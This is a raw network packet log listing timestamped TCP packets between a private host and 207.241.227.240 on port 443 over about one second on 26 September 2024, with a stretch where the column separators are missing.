Sep 26, 2024 10:58:04.306334019 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.306449890 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.306459904 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.309789896 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.346894979 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.346930027 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.346983910 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.347003937 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.347023964 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.347038984 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.348114014 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.348134995 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.348212004 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.348212004 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.348218918 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.348505974 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.350023031 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.350044012 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.350080013 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.350085020 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.350112915 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.350127935 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.439459085 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.439481020 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.439584017 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.439591885 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.439615965 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.439632893 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.460016966 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.460041046 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.460097075 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.460103035 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.460143089 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.461210012 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.461230040 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.461271048 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.461276054 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.461291075 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.461306095 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.462202072 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.462225914 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.462260962 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.462265015 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.462294102 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.482245922 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.482319117 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.482367992 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
                                      Sep 26, 2024 10:58:04.482435942 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.482479095 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.482683897 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507016897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507051945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507123947 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507143974 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507172108 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507190943 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527105093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527132034 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527199984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527241945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527278900 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527453899 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.547595978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547641993 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547677994 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.547703981 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547750950 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548391104 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548434019 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548460960 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548471928 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548491001 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548508883 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549253941 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549313068 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549340963 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549350977 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549370050 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549391031 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549688101 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549735069 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549762964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549771070 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549794912 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549813032 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550648928 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550688982 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550720930 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550731897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550745964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550765991 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.569791079 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569839001 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569890022 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.569958925 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569992065 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.570048094 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595243931 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595318079 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595365047 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595436096 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595482111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595482111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614495039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614535093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614597082 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614626884 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614648104 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614670038 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.634911060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.634957075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635009050 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635046959 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635076046 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635189056 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635379076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635422945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635446072 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635457039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635509014 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635530949 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635828972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635860920 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635902882 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635912895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635931969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635942936 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636399984 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636432886 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636472940 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636482000 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636504889 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636518955 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.639600039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.639636993 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.639681101 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.639700890 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.639718056 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.639972925 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.657382011 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.657421112 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.657480955 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.657500029 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.657533884 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.657547951 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.682092905 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.682147980 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.682193041 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.682223082 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.682244062 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.682265997 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.702224016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.702258110 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.702316999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.702348948 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.702378035 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.702394009 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722378016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722409964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722450018 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722480059 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722501993 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722521067 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722812891 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722846031 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722887039 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722896099 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.722915888 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.722933054 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.723517895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.723542929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.723578930 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.723586082 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.723607063 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.723628044 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724093914 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724113941 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724148035 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724153996 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724184990 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724199057 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724591017 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724611044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724642038 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724647045 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.724692106 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.724709988 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.747020960 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.747060061 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.747112989 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.747138977 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.747160912 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.747181892 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.769942999 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.769979954 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.770051003 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.770085096 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.770103931 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.770127058 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.794100046 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.794132948 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.794279099 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.794312954 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.794394016 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.809921980 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.809952974 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.810040951 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.810095072 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.810266972 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.810369968 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.810390949 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.810446024 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.810470104 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.810497046 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.810518026 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.811038971 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811059952 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811121941 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.811141968 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811191082 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.811593056 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811613083 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811654091 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.811671019 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.811698914 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.811717033 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.812114000 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.812133074 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.812171936 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.812184095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.812211037 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.812242985 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.832561016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.832626104 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.832685947 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.832719088 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.832736015 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.832757950 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.857729912 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.857798100 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.858015060 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.858047962 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.858099937 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.882882118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.882953882 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.883044958 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.883130074 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.883176088 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.883196115 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898152113 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898197889 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898243904 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898279905 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898298025 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898325920 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898495913 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898541927 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898593903 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898593903 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.898612022 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.898662090 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.899435043 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.899481058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.899518013 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.899542093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.899564981 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.899600029 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.899981022 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900021076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900068045 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.900091887 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900114059 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.900146008 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.900646925 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900700092 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900729895 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.900753021 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.900777102 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.900794983 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.920159101 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.920195103 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.920274019 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.920346975 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.920408964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.920408964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.948175907 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.948211908 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.948257923 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.948292017 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.948312044 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.948335886 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.968858004 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.968888044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.969000101 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.969021082 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.969082117 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.985021114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.985057116 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.985142946 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.985156059 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.985215902 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.985596895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.985619068 CEST44349711207.241.227.240192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 10:58:04.985667944 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.985678911 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.985707045 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.985728025 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.986073017 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986099005 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986154079 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.986171007 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986192942 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.986222982 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.986711979 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986732960 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986799955 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.986813068 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.986870050 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.987302065 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.987325907 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.987366915 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.987377882 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.987432003 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.987432003 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.007601976 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.007627010 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.007683039 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
